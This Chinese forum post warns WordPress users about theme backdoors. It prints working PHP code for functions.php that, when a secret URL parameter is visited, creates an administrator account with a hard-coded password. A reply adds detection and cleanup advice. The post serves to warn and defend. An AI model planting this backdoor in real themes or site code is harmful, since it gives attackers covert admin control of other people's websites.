防范wordpress主题加后门代码获取管理员权限

徐秀芬

代码如下:

add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

 

简单说明下，代码主要放于functions.php文件里面，不会影响任何功能使用，如果存在此代码，任何人只要运行http://www.你的域名.com/?backdoor=go，然后就创建了一个用户名为“backdoor”，密码为：“pa55w0rd!” 的管理员。同样具备管理员的权限，很编辑主题代码文件，相信此时你一定感觉到很危险了吧，赶紧检查检查自己的主题代码吧……

MiniMax

大家一定要重视这个问题！

这种后门代码确实非常危险，帖主已经分析得很清楚了。我来补充几点防范建议：

1. 如何检测：
- 检查主题的functions.php文件，搜索是否有可疑的wp_head、wp_footer钩子
- 特别留意有md5比较、wp_create_user、set_role这类函数
- 使用WordPress安全插件进行全面扫描

2. 防范措施：
- 只从官方渠道下载主题，不要使用来路不明的破解版主题
- 定期检查网站用户列表，看是否有陌生的管理员账户
- 及时更新WordPress核心和主题到最新版本
- 安装安全插件如Wordfence、iThemes Security等

3. 紧急处理：
如果发现已被植入后门：
- 立即删除可疑的管理员账户
- 更换所有管理员账户的密码
- 检查并清理functions.php中的可疑代码
- 检查是否有其他文件被植入后门

另外提醒：
很多所谓的"免费主题"、"破解主题"都暗藏这种后门，看似省钱其实后患无穷。建议大家还是支持正版，或者使用官方免费主题。

大家赶紧检查一下自己的网站吧！安全无小事！